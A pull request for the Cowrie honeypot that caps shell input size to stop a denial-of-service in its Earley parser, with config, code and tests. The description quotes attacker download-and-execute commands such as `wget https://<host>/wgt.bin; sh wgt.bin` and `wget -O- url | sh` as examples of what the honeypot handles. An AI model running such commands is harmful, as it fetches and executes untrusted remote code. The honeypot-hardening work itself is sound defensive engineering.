### PR TITLE
fix: cap the size of shell input fed to the parser

### DIFF
--- a/src/cowrie/data/etc/cowrie.cfg.dist
+++ b/src/cowrie/data/etc/cowrie.cfg.dist
@@ -630,6 +630,15 @@ ssh_version = OpenSSH_7.9p1, OpenSSL 1.1.1a  20 Nov 2018
 # (default: 20)
 #scp_max_files_per_session = 20
 
+# Maximum size (in bytes) of shell input parsed in one go: a command line, a
+# script file run with sh/bash/./file, or input piped into a shell. Parse cost
+# grows superlinearly with input size, so without a cap a large downloaded
+# file run as a script (for example an HTML error page fetched from a dead
+# payload URL) can hang the process. Longer input is refused: a script file
+# with "cannot execute binary file", a command line with a syntax error.
+# (default: 16384)
+#max_input_size = 16384
+
 
 # ============================================================================
 # SSH Specific Options

--- a/src/cowrie/shell/bashparse.py
+++ b/src/cowrie/shell/bashparse.py
@@ -72,6 +72,8 @@ if TYPE_CHECKING:
 from lark import Lark, Token, Tree
 from lark.exceptions import LarkError
 
+from cowrie.core.config import CowrieConfig
+
 # Grammar for the supported bash subset. Whitespace is significant as a word
 # separator, so it is matched explicitly rather than ignored: adjacent atoms
 # with no whitespace between them form a single word ("a"$x'b' -> one word).
@@ -177,6 +179,15 @@ _parser = Lark(
     lexer="dynamic",
     propagate_positions=True,
 )
+
+
+def max_input_size() -> int:
+    """Maximum size of shell input fed to the parser in one call
+    ([shell] max_input_size). The Earley parse cost grows superlinearly with
+    input size, so unbounded attacker-controlled input (e.g. an HTML error
+    page downloaded in place of a payload and run with ``sh x``) could block
+    the reactor for hours and exhaust memory."""
+    return CowrieConfig.getint("shell", "max_input_size", fallback=16384)
 
 
 class ShellContext(Protocol):
@@ -471,9 +482,7 @@ class BashParser:
 
         return statements
 
-    def _parse_statement(
-        self, line: str, cursor: _Cursor, op: str | None
-    ) -> Statement:
+    def _parse_statement(self, line: str, cursor: _Cursor, op: str | None) -> Statement:
         node = cursor.peek()
 
         # A subshell at command position runs in sequence; anything piped after
@@ -648,7 +657,9 @@ class BashParser:
         error = self._expect(cursor, "esac")
         if error is not None:
             return error
-        return CaseClause(word=Command(items=list(word_trees), line=line), items=items, op=op)
+        return CaseClause(
+            word=Command(items=list(word_trees), line=line), items=items, op=op
+        )
 
     def _parse_case_patterns(
         self, line: str, cursor: _Cursor

--- a/src/cowrie/shell/honeypot.py
+++ b/src/cowrie/shell/honeypot.py
@@ -36,6 +36,7 @@ from cowrie.shell.bashparse import (
     Subshell,
     SyntaxError_,
     WhileClause,
+    max_input_size,
 )
 from cowrie.shell.command import process_status
 from cowrie.shell.parser import CommandParser
@@ -249,6 +250,9 @@ class HoneyPotShell:
         self.protocol.events.dispatch(
             "cowrie.command.input", "CMD: %(input)s", input=line
         )
+        if self._reject_oversized(line):
+            self._advance()
+            return
         self._queue_statements(self.bashparser.parse(line))
         self._advance()
 
@@ -261,7 +265,19 @@ class HoneyPotShell:
         self.protocol.events.dispatch(
             "cowrie.command.input", "CMD: %(input)s", input=line
         )
+        if self._reject_oversized(line):
+            return
         self._queue_statements(self.bashparser.parse(line))
+
+    def _reject_oversized(self, line: str) -> bool:
+        """Refuse a line longer than max_input_size before it reaches the
+        parser, reporting it like a syntax error. The input is still
+        dispatched as a cowrie.command.input event: what the attacker sent
+        is worth logging even when it is not worth parsing."""
+        if len(line) <= max_input_size():
+            return False
+        self._report_syntax_error(SyntaxError_(token=""))
+        return True
 
     def _queue_statements(self, statements: list[Statement]) -> bool:
         """Append parsed statements to ``cmdpending`` for sequential execution.

--- a/src/cowrie/shell/script.py
+++ b/src/cowrie/shell/script.py
@@ -26,6 +26,7 @@ from __future__ import annotations
 
 from typing import TYPE_CHECKING
 
+from cowrie.shell.bashparse import max_input_size
 from cowrie.shell.fs import FileNotFound
 
 if TYPE_CHECKING:
@@ -109,7 +110,11 @@ def run_script_file(
         command.errorWrite(not_found_message)
         return
 
-    if is_executable_binary(contents):
+    # A file past the input cap is refused like a binary: parsing it would be
+    # superlinearly expensive (see max_input_size), and a legitimate shell
+    # script that large does not occur as a honeypot payload -- oversized
+    # "scripts" are binaries or web pages fetched from a dead payload URL.
+    if len(contents) > max_input_size() or is_executable_binary(contents):
         command.errorWrite(binary_message)
         return
 

--- a/src/cowrie/test/test_exec_shell_stdin.py
+++ b/src/cowrie/test/test_exec_shell_stdin.py
@@ -161,11 +161,18 @@ class ExecShellStdinTests(unittest.TestCase):
         self.assertEqual(bytes(out), b"kept\n" + PROMPT)
 
     def test_overlong_line_is_capped(self) -> None:
+        # The stdin buffer caps at STDIN_LINE_MAX so an endless unterminated
+        # stream cannot grow memory without bound; the capped line still
+        # exceeds max_input_size, so the shell refuses to parse it and the
+        # session stays usable.
         cap = protocol.HoneyPotExecProtocol.STDIN_LINE_MAX
         lsp, out, ended = self.drive(b"bash")
         lsp.dataReceived(b"echo " + b"A" * cap + b"\n")
         self.assertEqual(ended, {})
-        self.assertEqual(bytes(out), b"A" * (cap - len(b"echo ")) + b"\n")
+        self.assertIn(b"syntax error", bytes(out))
+        out.clear()
+        lsp.dataReceived(b"echo ok\n")
+        self.assertEqual(bytes(out), b"ok\n")
 
 
 if __name__ == "__main__":

--- a/src/cowrie/test/test_input_size.py
+++ b/src/cowrie/test/test_input_size.py
@@ -1,0 +1,170 @@
+# SPDX-FileCopyrightText: 2026 Michel Oosterhof <michel@oosterhof.net>
+#
+# SPDX-License-Identifier: BSD-3-Clause
+
+# ABOUTME: Tests for the cap on shell input size ([shell] max_input_size).
+# ABOUTME: Oversized script files and command lines are refused before parsing.
+
+from __future__ import annotations
+
+import os
+import tempfile
+import unittest
+from typing import ClassVar
+
+from cowrie.shell.command import HoneyPotCommand
+from cowrie.shell.protocol import HoneyPotInteractiveProtocol
+from cowrie.test.fake_server import FakeAvatar, FakeServer
+from cowrie.test.fake_transport import FakeTransport
+
+os.environ["COWRIE_HONEYPOT_DATA_PATH"] = "data"
+os.environ["COWRIE_HONEYPOT_DOWNLOAD_PATH"] = "/tmp"
+os.environ["COWRIE_SHELL_FILESYSTEM"] = "src/cowrie/data/fs.pickle"
+
+PROMPT = b"root@unitTest:~# "
+
+# The default [shell] max_input_size; tests build inputs just past it.
+LIMIT = 16384
+
+
+class InputSizeTestCase(unittest.TestCase):
+    def setUp(self) -> None:
+        self.proto = HoneyPotInteractiveProtocol(FakeAvatar(FakeServer()))
+        self.tr = FakeTransport("", "31337")
+        self.proto.makeConnection(self.tr)
+        self.tr.clear()
+
+    def tearDown(self) -> None:
+        self.proto.connectionLost()
+
+
+class OversizedScriptFileTests(InputSizeTestCase):
+    """sh/bash refuse a script file larger than max_input_size instead of
+    feeding it to the parser, whose cost grows superlinearly with input size:
+    a downloaded HTML error page run with `sh x` (a dead payload URL) could
+    otherwise block the reactor for hours."""
+
+    def setUp(self) -> None:
+        super().setUp()
+        self._tempfiles: list[str] = []
+
+    def tearDown(self) -> None:
+        super().tearDown()
+        for path in self._tempfiles:
+            os.unlink(path)
+
+    def plant_file(self, path: str, contents: bytes) -> None:
+        """Create a honeyfs file backed by a real file, bypassing the shell:
+        a redirect could not write it, as the command line itself would
+        exceed the input cap."""
+        with tempfile.NamedTemporaryFile(delete=False) as f:
+            f.write(contents)
+            self._tempfiles.append(f.name)
+        self.proto.fs.mkfile(path, 0, 0, len(contents), 0o644)
+        self.proto.fs.update_realfile(self.proto.fs.getfile(path), f.name)
+
+    def test_sh_refuses_oversized_script(self) -> None:
+        self.plant_file("/tmp/big.sh", b"echo OVERSIZED\n" * 1100)
+        self.proto.lineReceived(b"sh /tmp/big.sh")
+        output = self.tr.value()
+        self.assertIn(b"cannot execute binary file", output)
+        self.assertNotIn(b"OVERSIZED", output)
+        self.assertTrue(output.endswith(PROMPT))
+
+    def test_bash_refuses_oversized_script(self) -> None:
+        self.plant_file("/tmp/big2.sh", b"echo OVERSIZED\n" * 1100)
+        self.proto.lineReceived(b"bash /tmp/big2.sh")
+        output = self.tr.value()
+        self.assertIn(b"cannot execute binary file", output)
+        self.assertNotIn(b"OVERSIZED", output)
+
+    def test_dotslash_refuses_oversized_script(self) -> None:
+        self.plant_file("/tmp/big3.sh", b"#!/bin/sh\n" + b"echo OVERSIZED\n" * 1100)
+        self.proto.lineReceived(b"/tmp/big3.sh")
+        output = self.tr.value()
+        self.assertIn(b"cannot execute binary file", output)
+        self.assertNotIn(b"OVERSIZED", output)
+
+    def test_script_at_limit_still_runs(self) -> None:
+        # Exactly at the cap is allowed; only strictly larger is refused.
+        filler = b"# " + b"x" * (LIMIT - len(b"# \necho SMALL\n")) + b"\n"
+        contents = filler + b"echo SMALL\n"
+        self.assertEqual(len(contents), LIMIT)
+        self.plant_file("/tmp/small.sh", contents)
+        self.proto.lineReceived(b"sh /tmp/small.sh")
+        output = self.tr.value()
+        self.assertIn(b"SMALL", output)
+        self.assertNotIn(b"cannot execute binary file", output)
+
+
+class OversizedLineTests(InputSizeTestCase):
+    """The shell refuses to parse a single input line larger than
+    max_input_size, reporting it like a syntax error; this also covers
+    piped input and `sh -c`, which reuse lineReceived."""
+
+    def test_long_line_refused(self) -> None:
+        self.proto.lineReceived(b"echo SHOULD_NOT_RUN; : " + b"A" * (LIMIT + 1))
+        output = self.tr.value()
+        self.assertNotIn(b"SHOULD_NOT_RUN", output)
+        self.assertIn(b"syntax error", output)
+        self.assertTrue(output.endswith(PROMPT))
+
+    def test_long_line_sets_exit_status(self) -> None:
+        self.proto.lineReceived(b": " + b"A" * (LIMIT + 1))
+        self.tr.clear()
+        self.proto.lineReceived(b"echo rc=$?")
+        self.assertEqual(self.tr.value(), b"rc=2\n" + PROMPT)
+
+    def test_shell_survives_long_line(self) -> None:
+        self.proto.lineReceived(b": " + b"A" * (LIMIT + 1))
+        self.tr.clear()
+        self.proto.lineReceived(b"echo still_alive")
+        self.assertEqual(self.tr.value(), b"still_alive\n" + PROMPT)
+
+    def test_line_at_limit_still_parses(self) -> None:
+        line = b"echo ATLIMIT #" + b"x" * (LIMIT - len(b"echo ATLIMIT #"))
+        self.assertEqual(len(line), LIMIT)
+        self.proto.lineReceived(line)
+        output = self.tr.value()
+        self.assertIn(b"ATLIMIT", output)
+        self.assertNotIn(b"syntax error", output)
+
+
+class _HoldTerminal(HoneyPotCommand):
+    """A command that holds the terminal like a download in progress; typed
+    lines are queued on the shell until finish() releases it."""
+
+    pending: ClassVar[list[_HoldTerminal]] = []
+
+    def start(self) -> None:
+        _HoldTerminal.pending.append(self)
+
+    def finish(self) -> None:
+        self.exit()
+
+
+class OversizedQueuedLineTests(InputSizeTestCase):
+    """A line typed while a command holds the terminal goes through
+    queue_line, which parses at queue time and needs the same cap."""
+
+    def setUp(self) -> None:
+        super().setUp()
+        _HoldTerminal.pending = []
+        self.proto.commands["holdterm"] = _HoldTerminal
+
+    def tearDown(self) -> None:
+        del self.proto.commands["holdterm"]
+        super().tearDown()
+
+    def test_queued_long_line_refused(self) -> None:
+        self.proto.lineReceived(b"holdterm")
+        self.proto.lineReceived(b"echo SHOULD_NOT_RUN; : " + b"A" * (LIMIT + 1))
+        _HoldTerminal.pending[0].finish()
+        output = self.tr.value()
+        self.assertNotIn(b"SHOULD_NOT_RUN", output)
+        self.assertIn(b"syntax error", output)
+        self.assertTrue(output.endswith(PROMPT))
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
## Problem

Seen in production on 2026-07-31: an attacker ran `wget https://<host>/wgt.bin; sh wgt.bin`, but the payload URL was dead and the server returned its HTML homepage instead. The file is valid UTF-8 with no NUL bytes, so it passed the binary check and the entire document was handed to the Lark Earley parser in one call.

Earley parse cost grows superlinearly with input size, and HTML (dense with `<`, `>`, quotes, `$`, parens) is close to pathological input for a shell grammar. Measured on that page shape:

| input | parse time | max RSS |
|---|---|---|
| 2.5 KB | 3.3 s | 66 MB |
| 5 KB | 16.8 s | 181 MB |
| 10 KB | 87 s | 430 MB |

A typical 50–200 KB page extrapolates to hours of blocked reactor and GBs of memory — on a small VPS the OOM killer takes the process. Any honeypot whose attacker's payload URL now serves an HTML error page can hit this.

## Fix

New option `[shell] max_input_size` (default 16384 bytes). Input larger than the cap is refused before it reaches the parser:

- `run_script_file` (covers `sh x`, `bash x`, `./x`, shebang): refused with the existing `cannot execute binary file: Exec format error` message — an oversized "script" in the wild is a binary or a web page, so the message is plausible.
- `HoneyPotShell.lineReceived` / `queue_line`: refused as a bash syntax error (`syntax error: unexpected end of file`, status 2). This transitively covers `sh -c`, piped input (`cat x | sh`, `wget -O- url | sh`) and exec payloads, which all funnel through `lineReceived`.

The oversized input is still dispatched as a `cowrie.command.input` event first: what the attacker sent is worth logging even when it is not worth parsing.

The exec protocol's `STDIN_LINE_MAX` (128 KB) is unchanged — it bounds memory growth of an endless unterminated stdin stream, a different layer. Its test now expects the truncated 128 KB line to be refused by the parser cap rather than executed.

## Tests

New `test_input_size.py`: refusal for all three script invocation paths, oversized interactive lines, exit status $? = 2, shell survival afterwards, lines queued while a command holds the terminal, and at-limit boundaries in both directions. Full suite passes (1068 tests).